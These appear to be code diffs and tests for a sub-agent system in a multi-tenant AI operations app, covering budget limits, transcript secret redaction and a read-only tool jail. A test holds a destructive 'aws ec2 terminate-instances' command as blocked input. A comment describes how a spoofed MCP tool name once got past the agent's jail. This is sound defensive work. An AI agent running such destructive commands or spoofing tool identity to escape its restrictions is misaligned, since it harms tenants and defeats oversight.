+        expect(clampBudget({ subagentTimeoutMs: 'abc' as unknown as number }).subagentTimeoutMs)
+            .toBe(BUDGET_BOUNDS.subagentTimeoutMs.default);
+    });
+
+    it('honours an env ceiling lower than the built-in max', () => {
+        process.env.SUBAGENT_MAX_CONCURRENCY = '2';
+        expect(clampBudget({ maxConcurrentSubagents: 6 }).maxConcurrentSubagents).toBe(2);
+    });
+});
+
+describe('resolveSubagentBudget', () => {
+    it('returns a disabled budget when the platform kill-switch is off', async () => {
+        process.env.SUBAGENTS_ENABLED = 'false';
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue({ enabled: true } as never);
+
+        expect((await resolveSubagentBudget('t1')).enabled).toBe(false);
+    });
+
+    it('returns tenant config clamped when the platform allows it', async () => {
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue({
+            enabled: true, maxConcurrentSubagents: 99,
+        } as never);
+
+        const budget = await resolveSubagentBudget('t1');
+        expect(budget.enabled).toBe(true);
+        expect(budget.maxConcurrentSubagents).toBe(BUDGET_BOUNDS.maxConcurrentSubagents.max);
+    });
+
+    it('returns defaults (disabled) when the tenant has no config', async () => {
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue(null as never);
+        expect((await resolveSubagentBudget('t1')).enabled).toBe(false);
+    });
+
+    it('never throws when the config read fails', async () => {
+        vi.mocked(TenantConfigService.getConfig).mockRejectedValue(new Error('db down'));
+        await expect(resolveSubagentBudget('t1')).resolves.toMatchObject({ enabled: false });
+    });
+});
+
+describe('validateBudgetInput', () => {
+    it('accepts a well-formed payload', () => {
+        expect(validateBudgetInput({
+            enabled: true, maxConcurrentSubagents: 3, maxSubagentsPerRun: 8,
+            maxSubagentTokensPerRun: 400000, subagentMaxIterations: 8, subagentTimeoutMs: 180000,
+        })).toBeNull();
+    });
+
+    it('rejects a non-object', () => {
+        expect(validateBudgetInput(null)).toMatch(/object/i);
+    });
+
+    it('rejects a non-boolean enabled', () => {
+        expect(validateBudgetInput({ enabled: 'yes' })).toMatch(/enabled/i);
+    });
+
+    it('rejects an out-of-range number with a message naming the field', () => {
+        expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: 999 }))
+            .toMatch(/maxConcurrentSubagents/);
+    });
+});

--- a/apps/web-ui/lib/agent/subagent-budget.ts
+++ b/apps/web-ui/lib/agent/subagent-budget.ts
@@ -3,7 +3,7 @@
  *
  * web-ui runs as a SHARED ECS task, so these limits cannot be purely
  * tenant-controlled: one tenant setting concurrency to 50 would saturate the
- * container's event loop for every co-tenant and flood their Bedrock quota.
+ * container's event loop for every co-tenant and flood their LLM provider quota.
  * Env vars are therefore CEILINGS, not overrides:
  *
  *     effective = clamp(tenantConfig ?? default, MIN, envCeiling)
@@ -100,6 +100,12 @@ export function validateBudgetInput(input: unknown): string | null {
 
     for (const key of Object.keys(BOUNDS_SPEC) as NumericKey[]) {
         if (body[key] === undefined) continue;
+        // Type-check BEFORE coercing: this function is the trust boundary for the
+        // PUT /api/settings/aiops route, and Number() would silently accept
+        // `true` as 1 or "3" as 3.
+        if (typeof body[key] !== 'number') {
+            return `${key} must be a number`;
+        }
         const spec = BOUNDS_SPEC[key];
         const value = Number(body[key]);
         const ceiling = ceilingFor(key);

--- a/apps/web-ui/lib/agent/subagent-budget.ts
+++ b/apps/web-ui/lib/agent/subagent-budget.ts
@@ -11,8 +11,9 @@
  * Clamping runs on READ (not only on write) so lowering a ceiling retroactively
  * binds config rows written while it was higher.
  *
- * SUBAGENTS_ENABLED is an absolute platform kill-switch: tenant config can
- * never re-enable the feature when it is off.
+ * SUBAGENTS_ENABLED=false is an emergency platform kill-switch: tenant config
+ * can never re-enable the feature while it is set. Unset means enabled — the
+ * per-tenant UI toggle is the normal control.
  */
 import { TenantConfigService } from '@/lib/tenant-config-service';
 
@@ -53,9 +54,14 @@ function ceilingFor(key: NumericKey): number {
     return Math.min(spec.max, Math.round(fromEnv));
 }
 
-/** Absolute platform kill-switch. Defaults to OFF. */
+/**
+ * Emergency platform kill-switch. Sub-agents are UI-driven: each tenant's
+ * toggle in the AI Ops settings decides, and no env var is required. Setting
+ * SUBAGENTS_ENABLED=false disables the feature deployment-wide regardless of
+ * tenant config — an ops brake for a shared-ECS incident, not a launch gate.
+ */
 export function platformSubagentsEnabled(): boolean {
-    return process.env.SUBAGENTS_ENABLED === 'true';
+    return process.env.SUBAGENTS_ENABLED !== 'false';
 }
 
 export function clampBudget(input: Partial<SubagentBudgetConfig> | null): SubagentBudgetConfig {

--- a/apps/web-ui/lib/agent/subagent-budget.ts
+++ b/apps/web-ui/lib/agent/subagent-budget.ts
@@ -1,0 +1,112 @@
+/**
+ * Sub-agent budget configuration.
+ *
+ * web-ui runs as a SHARED ECS task, so these limits cannot be purely
+ * tenant-controlled: one tenant setting concurrency to 50 would saturate the
+ * container's event loop for every co-tenant and flood their Bedrock quota.
+ * Env vars are therefore CEILINGS, not overrides:
+ *
+ *     effective = clamp(tenantConfig ?? default, MIN, envCeiling)
+ *
+ * Clamping runs on READ (not only on write) so lowering a ceiling retroactively
+ * binds config rows written while it was higher.
+ *
+ * SUBAGENTS_ENABLED is an absolute platform kill-switch: tenant config can
+ * never re-enable the feature when it is off.
+ */
+import { TenantConfigService } from '@/lib/tenant-config-service';
+
+export const SUBAGENT_CONFIG_KEY = 'aiops-subagents';
+
+export interface SubagentBudgetConfig {
+    enabled: boolean;
+    maxConcurrentSubagents: number;
+    maxSubagentsPerRun: number;
+    maxSubagentTokensPerRun: number;
+    subagentMaxIterations: number;
+    subagentTimeoutMs: number;
+}
+
+type NumericKey = keyof Omit<SubagentBudgetConfig, 'enabled'>;
+
+interface Bound { min: number; max: number; default: number; envCeiling: string }
+
+/**
+ * `max` is the hard platform ceiling. `envCeiling` names an env var that may
+ * lower it further (never raise it) for a given deployment.
+ */
+const BOUNDS_SPEC: Record<NumericKey, Bound> = {
+    maxConcurrentSubagents:  { min: 1,      max: 6,       default: 3,       envCeiling: 'SUBAGENT_MAX_CONCURRENCY' },
+    maxSubagentsPerRun:      { min: 1,      max: 16,      default: 8,       envCeiling: 'SUBAGENT_MAX_PER_RUN' },
+    maxSubagentTokensPerRun: { min: 50_000, max: 1_000_000, default: 400_000, envCeiling: 'SUBAGENT_MAX_TOKENS_PER_RUN' },
+    subagentMaxIterations:   { min: 2,      max: 16,      default: 8,       envCeiling: 'SUBAGENT_MAX_ITERATIONS' },
+    subagentTimeoutMs:       { min: 30_000, max: 300_000, default: 180_000, envCeiling: 'SUBAGENT_TIMEOUT_MS' },
+};
+
+export const BUDGET_BOUNDS = BOUNDS_SPEC;
+
+/** The effective ceiling: the built-in max, lowered (never raised) by env. */
+function ceilingFor(key: NumericKey): number {
+    const spec = BOUNDS_SPEC[key];
+    const fromEnv = Number(process.env[spec.envCeiling]);
+    if (!Number.isFinite(fromEnv) || fromEnv <= 0) return spec.max;
+    return Math.min(spec.max, Math.round(fromEnv));
+}
+
+/** Absolute platform kill-switch. Defaults to OFF. */
+export function platformSubagentsEnabled(): boolean {
+    return process.env.SUBAGENTS_ENABLED === 'true';
+}
+
+export function clampBudget(input: Partial<SubagentBudgetConfig> | null): SubagentBudgetConfig {
+    const result: Record<string, unknown> = { enabled: input?.enabled === true };
+
+    for (const key of Object.keys(BOUNDS_SPEC) as NumericKey[]) {
+        const spec = BOUNDS_SPEC[key];
+        const raw = Number(input?.[key]);
+        const value = Number.isFinite(raw) ? Math.round(raw) : spec.default;
+        result[key] = Math.min(ceilingFor(key), Math.max(spec.min, value));
+    }
+
+    return result as unknown as SubagentBudgetConfig;
+}
+
+/**
+ * Read a tenant's budget, clamped. Never throws: a config-store failure must
+ * degrade to "sub-agents off", not break the chat run.
+ */
+export async function resolveSubagentBudget(tenantId: string): Promise<SubagentBudgetConfig> {
+    if (!platformSubagentsEnabled()) {
+        return { ...clampBudget(null), enabled: false };
+    }
+
+    const stored = await TenantConfigService
+        .getConfig<Partial<SubagentBudgetConfig>>(SUBAGENT_CONFIG_KEY, tenantId)
+        .catch(() => null);
+
+    return clampBudget(stored);
+}
+
+/** Validate a PUT payload. Returns an error string for a 400, or null. */
+export function validateBudgetInput(input: unknown): string | null {
+    if (!input || typeof input !== 'object' || Array.isArray(input)) {
+        return 'Request body must be an object';
+    }
+    const body = input as Record<string, unknown>;
+
+    if (typeof body.enabled !== 'boolean') {
+        return 'enabled must be a boolean';
+    }
+
+    for (const key of Object.keys(BOUNDS_SPEC) as NumericKey[]) {
+        if (body[key] === undefined) continue;
+        const spec = BOUNDS_SPEC[key];
+        const value = Number(body[key]);
+        const ceiling = ceilingFor(key);
+        if (!Number.isInteger(value) || value < spec.min || value > ceiling) {
+            return `${key} must be an integer between ${spec.min} and ${ceiling}`;
+        }
+    }
+
+    return null;
+}

--- a/apps/web-ui/lib/agent/subagent-redact.ts
+++ b/apps/web-ui/lib/agent/subagent-redact.ts
@@ -1,0 +1,167 @@
+/**
+ * Secret redaction for sub-agent transcripts, applied at the persistence boundary.
+ *
+ * Why this exists: the `aws_read` allowlist permits `lambda
+ * get-function-configuration`, which returns `Environment.Variables` in PLAINTEXT —
+ * DB passwords, API keys, Stripe secrets (see the NOTE in aws-read-tool.ts). A
+ * sub-agent transcript is persisted for 30 days in a multi-tenant database that also
+ * backs chat history, so those values must never reach at-rest storage. The sub-agent
+ * still sees the value live in its own reasoning; that is accepted and out of scope.
+ *
+ * Two complementary strategies:
+ *   - by LOCATION — everything under an `Environment.Variables` object is redacted,
+ *     because an arbitrary env var name tells us nothing about its sensitivity;
+ *   - by KEY NAME — a secret-shaped key is redacted wherever it appears.
+ *
+ * Only the VALUE is replaced. Keys are always preserved: an operator expanding a card
+ * needs to see that `DB_PASSWORD` exists.
+ *
+ * Pure, synchronous, no I/O, no imports from the agent runtime — and total. It runs
+ * inside a database write, so throwing would fail the persistence it exists to protect.
+ */
+
+export const REDACTED = '[REDACTED]';
+
+/** Depth ceiling. Beyond it we fail closed rather than emit an unwalked subtree. */
+const MAX_DEPTH = 64;
+
+/** Case-insensitive substring match against a key name. */
+const SECRET_KEY_PATTERNS = [
+    'password',
+    'passwd',
+    'secret',
+    'token',
+    'apikey',
+    'api_key',
+    'api-key',
+    'credential',
+    'privatekey',
+    'private_key',
+    'sessiontoken',
+];
+
+function isSecretKey(key: string): boolean {
+    const lower = key.toLowerCase();
+    return SECRET_KEY_PATTERNS.some(pattern => lower.includes(pattern));
+}
+
+/** Alternation used by the non-JSON fallback. Ordered longest-first so `api_key` wins over `key`. */
+const SECRET_KEY_ALTERNATION = '[A-Za-z0-9_.\\-]*(?:password|passwd|secret|token|api[_-]?key|credential|private[_-]?key)[A-Za-z0-9_.\\-]*';
+
+/**
+ * Redact a parsed JSON value in place-free fashion.
+ *
+ * @param redactAll true when the caller is already inside an `Environment.Variables`
+ *                  object, where every value is redacted regardless of its key.
+ */
+function redactValue(value: unknown, depth: number, seen: WeakSet<object>, redactAll: boolean): unknown {
+    if (depth > MAX_DEPTH) return REDACTED;
+    if (value === null || typeof value !== 'object') {
+        return redactAll ? REDACTED : value;
+    }
+
+    const asObject = value as object;
+    // A cycle can only come from a caller handing us a live object graph (parsed JSON
+    // is always acyclic). Break it rather than recursing forever.
+    if (seen.has(asObject)) return '[CYCLE]';
+    seen.add(asObject);
+
+    if (Array.isArray(value)) {
+        return value.map(item => redactValue(item, depth + 1, seen, redactAll));
+    }
+
+    const out: Record<string, unknown> = {};
+    for (const [key, child] of Object.entries(value as Record<string, unknown>)) {
+        if (redactAll || isSecretKey(key)) {
+            // Redact the whole subtree: a secret-named key may hold an object.
+            out[key] = redactValue(child, depth + 1, seen, true);
+            continue;
+        }
+        // Redact by LOCATION: everything under `Environment: { Variables: {...} }`.
+        // Keyed on `Variables` alone rather than the full path — an object named
+        // `Variables` in an AWS response is env vars whatever its parent, and erring
+        // wide here costs an operator nothing but erring narrow leaks a secret.
+        out[key] = redactValue(child, depth + 1, seen, /^variables$/i.test(key));
+    }
+    return out;
+}
+
+/** Regex scrubbing for text that is not JSON (shell commands, prose, truncated output). */
+function redactPlainText(text: string): string {
+    let out = text;
+    // "key": "value"  /  'key': 'value'
+    out = out.replace(
+        new RegExp(`(["']?${SECRET_KEY_ALTERNATION}["']?\\s*:\\s*)(["'])(?:\\\\.|(?!\\2).)*\\2`, 'gi'),
+        (_m, prefix: string, quote: string) => `${prefix}${quote}${REDACTED}${quote}`,
+    );
+    // key: value   (unquoted, to end of line / delimiter)
+    out = out.replace(
+        new RegExp(`(\\b${SECRET_KEY_ALTERNATION}\\s*:\\s*)([^\\s,;}"']+)`, 'gi'),
+        (_m, prefix: string) => `${prefix}${REDACTED}`,
+    );
+    // KEY=value  (shell assignment)
+    out = out.replace(
+        new RegExp(`(\\b${SECRET_KEY_ALTERNATION}\\s*=\\s*)("[^"]*"|'[^']*'|[^\\s&;|]+)`, 'gi'),
+        (_m, prefix: string) => `${prefix}${REDACTED}`,
+    );
+    return out;
+}
+
+/** Redact one transcript entry's `text`, preferring a structural walk over regex. */
+function redactText(text: string): string {
+    const trimmed = text.trim();
+    const looksStructural = trimmed.startsWith('{') || trimmed.startsWith('[');
+
+    if (looksStructural) {
+        try {
+            const parsed: unknown = JSON.parse(trimmed);
+            return JSON.stringify(redactValue(parsed, 0, new WeakSet(), false));
+        } catch {
+            // Truncated or otherwise unparseable JSON — fall through to regex. Never
+            // return the raw input here: that is exactly the leak path.
+        }
+    }
+    return redactPlainText(text);
+}
+
+function isTranscriptEntry(value: unknown): value is { text: string } {
+    return typeof value === 'object'
+        && value !== null
+        && typeof (value as { text?: unknown }).text === 'string';
+}
+
+/**
+ * Redact secrets from a sub-agent transcript (or any value on its way to storage).
+ *
+ * `null`/`undefined` pass through unchanged. An array of transcript entries has each
+ * entry's `text` scrubbed; anything else is walked structurally. Never throws — on an
+ * internal error the input is replaced with a safe placeholder rather than persisted raw.
+ */
+export function redactTranscript<T>(transcript: T): T {
+    if (transcript === null || transcript === undefined) return transcript;
+
+    try {
+        if (typeof transcript === 'string') {
+            return redactText(transcript) as unknown as T;
+        }
+
+        if (Array.isArray(transcript)) {
+            return transcript.map(item =>
+                isTranscriptEntry(item)
+                    ? { ...item, text: redactText(item.text) }
+                    : redactValue(item, 0, new WeakSet(), false),
+            ) as unknown as T;
+        }
+
+        if (isTranscriptEntry(transcript)) {
+            return { ...transcript, text: redactText(transcript.text) } as unknown as T;
+        }
+
+        return redactValue(transcript, 0, new WeakSet(), false) as unknown as T;
+    } catch (error) {
+        console.error('[subagent-redact] redaction failed; storing a placeholder instead:', error);
+        // Fail closed: a redactor that cannot prove the payload is clean must not
+        // hand the raw payload to the database.
+        return REDACTED as unknown as T;
+    }
+}

--- a/apps/web-ui/lib/agent/subagent-redact.ts
+++ b/apps/web-ui/lib/agent/subagent-redact.ts
@@ -49,6 +49,57 @@ function isSecretKey(key: string): boolean {
 const SECRET_KEY_ALTERNATION = '[A-Za-z0-9_.\\-]*(?:password|passwd|secret|token|api[_-]?key|credential|private[_-]?key)[A-Za-z0-9_.\\-]*';
 
 /**
+ * Credentials embedded in a URL: `scheme://user:password@host` → the password is
+ * replaced, the user and host kept. No key name is involved, so neither the key-name
+ * nor the location rule can see these — and an `OutputValue` holding a connection
+ * string is a realistic `describe-stacks` response.
+ *
+ * The userinfo segment forbids `/` so a path containing `@` (an S3 key, an ARN) can
+ * never be mistaken for credentials, and it requires a `:` so `ssh://git@github.com`
+ * is left alone.
+ */
+const URL_CREDENTIAL_RE = /\b([A-Za-z][A-Za-z0-9+.\-]*:\/\/)([^\s:/@]*):([^\s/@]+)@/g;
+
+function redactUrlCredentials(text: string): string {
+    return text.replace(URL_CREDENTIAL_RE, (_m, scheme: string, user: string) => `${scheme}${user}:${REDACTED}@`);
+}
+
+/**
+ * Sibling name/value pairs: `{ParameterKey: 'DBPassword', ParameterValue: 'hunter2'}`.
+ *
+ * The secret sits under a key that is NOT secret-shaped (`ParameterValue`); what names
+ * it is a *sibling* field. Key-name matching is structurally blind to this, and it is
+ * the shape `cloudformation describe-stacks` returns — the exact call an audit
+ * sub-agent makes. The same shape covers container env definitions
+ * (`{name, value}`) and bare `{Key, Value}` tags.
+ *
+ * Only the value is redacted, never the name, so an operator still sees WHICH
+ * parameter was withheld.
+ *
+ * @returns the field names in this object whose values must be redacted.
+ */
+function siblingSecretFields(obj: Record<string, unknown>): Set<string> {
+    const redact = new Set<string>();
+    const byLower = new Map<string, string>();
+    for (const key of Object.keys(obj)) byLower.set(key.toLowerCase(), key);
+
+    for (const [lower, actual] of byLower) {
+        const name = obj[actual];
+        // The NAME must itself be a string, and it is the string we test for
+        // secret-ness — not the key it is stored under.
+        if (typeof name !== 'string' || !isSecretKey(name)) continue;
+
+        for (const suffix of ['key', 'name']) {
+            if (!lower.endsWith(suffix)) continue;
+            // `ParameterKey` pairs with `ParameterValue`; `Key` with `Value`.
+            const partner = byLower.get(`${lower.slice(0, -suffix.length)}value`);
+            if (partner !== undefined && partner !== actual) redact.add(partner);
+        }
+    }
+    return redact;
+}
+
+/**
  * Redact a parsed JSON value in place-free fashion.
  *
  * @param redactAll true when the caller is already inside an `Environment.Variables`
@@ -57,7 +108,9 @@ const SECRET_KEY_ALTERNATION = '[A-Za-z0-9_.\\-]*(?:password|passwd|secret|token
 function redactValue(value: unknown, depth: number, seen: WeakSet<object>, redactAll: boolean): unknown {
     if (depth > MAX_DEPTH) return REDACTED;
     if (value === null || typeof value !== 'object') {
-        return redactAll ? REDACTED : value;
+        if (redactAll) return REDACTED;
+        // A credential can hide inside an otherwise innocuous string value.
+        return typeof value === 'string' ? redactUrlCredentials(value) : value;
     }
 
     const asObject = value as object;
@@ -70,9 +123,12 @@ function redactValue(value: unknown, depth: number, seen: WeakSet<object>, redac
         return value.map(item => redactValue(item, depth + 1, seen, redactAll));
     }
 
+    const record = value as Record<string, unknown>;
+    const siblingSecrets = redactAll ? null : siblingSecretFields(record);
+
     const out: Record<string, unknown> = {};
-    for (const [key, child] of Object.entries(value as Record<string, unknown>)) {
-        if (redactAll || isSecretKey(key)) {
+    for (const [key, child] of Object.entries(record)) {
+        if (redactAll || isSecretKey(key) || siblingSecrets?.has(key)) {
             // Redact the whole subtree: a secret-named key may hold an object.
             out[key] = redactValue(child, depth + 1, seen, true);
             continue;
@@ -86,9 +142,25 @@ function redactValue(value: unknown, depth: number, seen: WeakSet<object>, redac
     return out;
 }
 
+/**
+ * Sibling name/value pairs in text the structural walk could not parse. Truncated JSON
+ * is the common case, not the exotic one: a sub-agent's tool output is capped, so a
+ * large `describe-stacks` response arrives here with its tail cut off.
+ */
+const SIBLING_PAIR_TEXT_RE =
+    /("[A-Za-z0-9_.\-]*(?:Key|Name)"\s*:\s*")((?:\\.|[^"])*)("\s*,\s*"[A-Za-z0-9_.\-]*Value"\s*:\s*")(?:\\.|[^"])*(")/gi;
+
 /** Regex scrubbing for text that is not JSON (shell commands, prose, truncated output). */
 function redactPlainText(text: string): string {
     let out = text;
+    // Credentials inside a URL — no key name to match on, so this must run here too.
+    out = redactUrlCredentials(out);
+    // {"ParameterKey":"DBPassword","ParameterValue":"…"} — the name is a sibling field.
+    out = out.replace(
+        SIBLING_PAIR_TEXT_RE,
+        (whole, open: string, name: string, mid: string, close: string) =>
+            isSecretKey(name) ? `${open}${name}${mid}${REDACTED}${close}` : whole,
+    );
     // "key": "value"  /  'key': 'value'
     out = out.replace(
         new RegExp(`(["']?${SECRET_KEY_ALTERNATION}["']?\\s*:\\s*)(["'])(?:\\\\.|(?!\\2).)*\\2`, 'gi'),

--- a/apps/web-ui/lib/agent/subagent-tool-marker.ts
+++ b/apps/web-ui/lib/agent/subagent-tool-marker.ts
@@ -1,0 +1,41 @@
+/**
+ * Identity marker for tools that are safe for a sub-agent BY THEIR OWN
+ * IMPLEMENTATION rather than by what `classifyTool` says about their name.
+ *
+ * The sub-agent jail used to exempt any tool *named* `aws_read`. Remote MCP tool
+ * names are kept UNPREFIXED (mcp-manager.ts), so a tenant-configured MCP server
+ * exposing a tool called `aws_read` was waved straight through the fail-closed
+ * jail — and, being last in `toolsByName`, it also shadowed the real tool. A name
+ * is a claim; this marker is identity.
+ *
+ * A unique `Symbol()`, deliberately NOT `Symbol.for()`: a registered symbol can be
+ * re-derived from its string key by anyone, and a marker anyone can mint is a name
+ * again. A tool reconstructed from remote JSON cannot carry a symbol-keyed property
+ * at all, which is the property that makes this unforgeable across the MCP boundary.
+ *
+ * Lives in its own dependency-free module so `subagent.ts` can check the marker
+ * without importing `aws-read-tool.ts` (and through it `tools.ts`, the AWS SDK and
+ * `@/env`) — and so a later `dispatch_agent` tool in `tools.ts` cannot close an
+ * import cycle through it. `aws-read-tool.ts` re-exports it for convenience.
+ */
+export const SUBAGENT_READ_ONLY_TOOL: unique symbol = Symbol('nucleus.subagent.readOnlyTool');
+
+/** Stamp the marker on a tool instance. Non-enumerable so it never lands in serialised tool specs. */
+export function markSubagentReadOnlyTool<T extends object>(instance: T): T {
+    Object.defineProperty(instance, SUBAGENT_READ_ONLY_TOOL, {
+        value: true,
+        enumerable: false,
+        writable: false,
+        configurable: false,
+    });
+    return instance;
+}
+
+/** True only for an instance this process stamped. Never true for a plain `{ name: 'aws_read' }`. */
+export function hasSubagentReadOnlyMarker(instance: unknown): boolean {
+    return (
+        (typeof instance === 'object' || typeof instance === 'function') &&
+        instance !== null &&
+        (instance as Record<symbol, unknown>)[SUBAGENT_READ_ONLY_TOOL] === true
+    );
+}

--- a/apps/web-ui/lib/agent/subagent.test.ts
+++ b/apps/web-ui/lib/agent/subagent.test.ts
@@ -1,0 +1,167 @@
+import { describe, it, expect, vi } from 'vitest';
+import {
+    isReadOnlyForSubagent,
+    filterReadOnlyTools,
+    runSubagent,
+    SUBAGENT_REPORT_MAX_CHARS,
+    type SubagentSpec,
+} from './subagent';
+
+const BUDGET = {
+    enabled: true,
+    maxConcurrentSubagents: 3,
+    maxSubagentsPerRun: 8,
+    maxSubagentTokensPerRun: 400_000,
+    subagentMaxIterations: 4,
+    subagentTimeoutMs: 5_000,
+};
+
+const SPEC: SubagentSpec = {
+    role: 'EC2 auditor',
+    task: 'List idle instances in account 111111111111',
+    expectedOutput: 'instance ids with CPU below 5%',
+};
+
+/** Model stub: returns each scripted response in turn. */
+function scriptedModel(responses: Array<{ content: string; tool_calls?: Array<{ id: string; name: string; args: Record<string, unknown> }> }>) {
+    let i = 0;
+    const model: any = {
+        bindTools: () => model,
+        invoke: vi.fn(async () => {
+            const r = responses[Math.min(i, responses.length - 1)];
+            i++;
+            return { content: r.content, tool_calls: r.tool_calls ?? [], usage_metadata: { input_tokens: 100, output_tokens: 20 } };
+        }),
+    };
+    return model;
+}
+
+const readTool = { name: 'describe_instances', invoke: vi.fn(async () => 'i-123 running') };
+const shellRead = { name: 'execute_command', invoke: vi.fn(async () => 'ok') };
+const writeTool = { name: 'write_file', invoke: vi.fn(async () => 'written') };
+
+describe('isReadOnlyForSubagent', () => {
+    it('allows an explicit read-only tool', () => {
+        expect(isReadOnlyForSubagent('describe_instances').allowed).toBe(true);
+    });
+
+    it('allows a read-only shell command', () => {
+        expect(isReadOnlyForSubagent('execute_command', { command: 'aws ec2 describe-instances' }).allowed).toBe(true);
+    });
+
+    it('blocks a mutative shell command', () => {
+        const verdict = isReadOnlyForSubagent('execute_command', { command: 'aws ec2 terminate-instances --instance-ids i-1' });
+        expect(verdict.allowed).toBe(false);
+        expect(verdict.reason).toMatch(/mutat/i);
+    });
+
+    it('blocks a mutative tool name', () => {
+        expect(isReadOnlyForSubagent('write_file').allowed).toBe(false);
+    });
+
+    it('blocks an unknown-named tool (fail closed)', () => {
+        // classifyTool returns isMutative:false, matchedRule:false for unknowns.
+        // In the orchestrator that means "ask the human"; here there is no human,
+        // so it must mean "block".
+        const verdict = isReadOnlyForSubagent('some_mcp_thing');
+        expect(verdict.allowed).toBe(false);
+        expect(verdict.reason).toMatch(/not on the verified read-only list/i);
+    });
+
+    it('blocks dispatch_agent so sub-agents cannot recurse', () => {
+        expect(isReadOnlyForSubagent('dispatch_agent').allowed).toBe(false);
+    });
+
+    it('blocks ask_user — no human is reachable inside a tool call', () => {
+        expect(isReadOnlyForSubagent('ask_user').allowed).toBe(false);
+    });
+});
+
+describe('filterReadOnlyTools', () => {
+    it('keeps read-only tools and drops the rest', () => {
+        const kept = filterReadOnlyTools([readTool, shellRead, writeTool, { name: 'dispatch_agent' }]);
+        expect(kept.map(t => t.name)).toEqual(['describe_instances', 'execute_command']);
+    });
+});
+
+describe('runSubagent', () => {
+    it('returns the final prose as the report', async () => {
+        const model = scriptedModel([{ content: 'Found 2 idle instances: i-1, i-2' }]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+
+        expect(result.status).toBe('done');
+        expect(result.report).toContain('i-1');
+        expect(result.tokensIn).toBe(100);
+    });
+
+    it('executes an allowed tool call and loops', async () => {
+        const model = scriptedModel([
+            { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }] },
+            { content: 'Instance i-123 is running' },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+
+        expect(readTool.invoke).toHaveBeenCalled();
+        expect(result.toolCount).toBe(1);
+        expect(result.report).toContain('i-123');
+    });
+
+    it('refuses a mutative tool call instead of executing it', async () => {
+        const model = scriptedModel([
+            { content: '', tool_calls: [{ id: '1', name: 'write_file', args: { file_path: 'x', content: 'y' } }] },
+            { content: 'Understood — reporting instead.' },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool, writeTool], budget: BUDGET });
+
+        expect(writeTool.invoke).not.toHaveBeenCalled();
+        expect(result.status).toBe('done');
+    });
+
+    it('stops at the iteration cap and marks the report incomplete', async () => {
+        const model = scriptedModel([
+            { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }] },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: { ...BUDGET, subagentMaxIterations: 2 } });
+
+        expect(result.report).toMatch(/incomplete/i);
+        expect(model.invoke).toHaveBeenCalledTimes(2);
+    });
+
+    it('truncates an over-long report', async () => {
+        const model = scriptedModel([{ content: 'x'.repeat(SUBAGENT_REPORT_MAX_CHARS + 5000) }]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+
+        expect(result.report.length).toBeLessThanOrEqual(SUBAGENT_REPORT_MAX_CHARS + 100);
+        expect(result.report).toMatch(/TRUNCATED/);
+    });
+
+    it('returns a failed status instead of throwing when the model errors', async () => {
+        const model: any = { bindTools: () => model, invoke: vi.fn().mockRejectedValue(new Error('provider down')) };
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+
+        expect(result.status).toBe('failed');
+        expect(result.report).toMatch(/provider down/);
+    });
+
+    it('returns partial findings on timeout', async () => {
+        const model: any = {
+            bindTools: () => model,
+            invoke: vi.fn(() => new Promise(resolve => setTimeout(() => resolve({ content: 'late', tool_calls: [] }), 500))),
+        };
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: { ...BUDGET, subagentTimeoutMs: 50 } });
+
+        expect(result.report).toMatch(/timed out/i);
+    });
+
+    it('reports a failing tool without aborting the loop', async () => {
+        const boom = { name: 'describe_instances', invoke: vi.fn().mockRejectedValue(new Error('AccessDenied')) };
+        const model = scriptedModel([
+            { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }] },
+            { content: 'Could not read: AccessDenied' },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [boom], budget: BUDGET });
+
+        expect(result.status).toBe('done');
+        expect(result.report).toContain('AccessDenied');
+    });
+});

--- a/apps/web-ui/lib/agent/subagent.test.ts
+++ b/apps/web-ui/lib/agent/subagent.test.ts
@@ -3,6 +3,7 @@ import {
     isReadOnlyForSubagent,
     filterReadOnlyTools,
     runSubagent,
+    SUBAGENT_MODEL_TAG,
     SUBAGENT_REPORT_MAX_CHARS,
     type SubagentSpec,
 } from './subagent';
@@ -317,5 +318,48 @@ describe('hallucinated tool names', () => {
         const result = await runSubagent(SPEC, { model, tools: [], budget: BUDGET });
         expect(result.status).toBe('done');
         expect(result.transcript.some(e => e.text.includes('REFUSED'))).toBe(true);
+    });
+});
+
+// The sub-agent's model calls run INSIDE the orchestrator's LangGraph run, so
+// their callback events reach the chat route's streamEvents pipeline. The tag is
+// the only thing that lets the route filter them out of its single-threaded
+// text-part state machine — without it, concurrent sub-agents corrupt part ids
+// and the client kills the stream.
+describe('sub-agent model call tagging', () => {
+    it('tags every model invocation with SUBAGENT_MODEL_TAG', async () => {
+        const model = scriptedModel([
+            { content: 'look', tool_calls: [{ id: 'c1', name: 'describe_instances', args: {} }] },
+            { content: 'done, findings: none' },
+        ]);
+        await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+        expect(model.invoke.mock.calls.length).toBeGreaterThan(0);
+        for (const call of model.invoke.mock.calls) {
+            expect(call[1]).toMatchObject({ tags: [SUBAGENT_MODEL_TAG] });
+        }
+    });
+});
+
+describe('sub-agent progress lastTool', () => {
+    it('announces the tool batch before it runs and the last tool after', async () => {
+        const model = scriptedModel([
+            {
+                content: 'looking', tool_calls: [
+                    { id: 'c1', name: 'describe_instances', args: {} },
+                    { id: 'c2', name: 'describe_instances', args: { next: true } },
+                ],
+            },
+            { content: 'done' },
+        ]);
+        const events: Array<{ lastTool?: string }> = [];
+        await runSubagent(SPEC, {
+            model, tools: [readTool], budget: BUDGET,
+            onEvent: (p) => events.push(p),
+        });
+        // Pre-batch event names the batch (first tool + count) so the card shows a
+        // live action line while the calls are still in flight.
+        expect(events.some(e => e.lastTool === 'describe_instances (+1 more)')).toBe(true);
+        // Post-batch event carries the last executed tool.
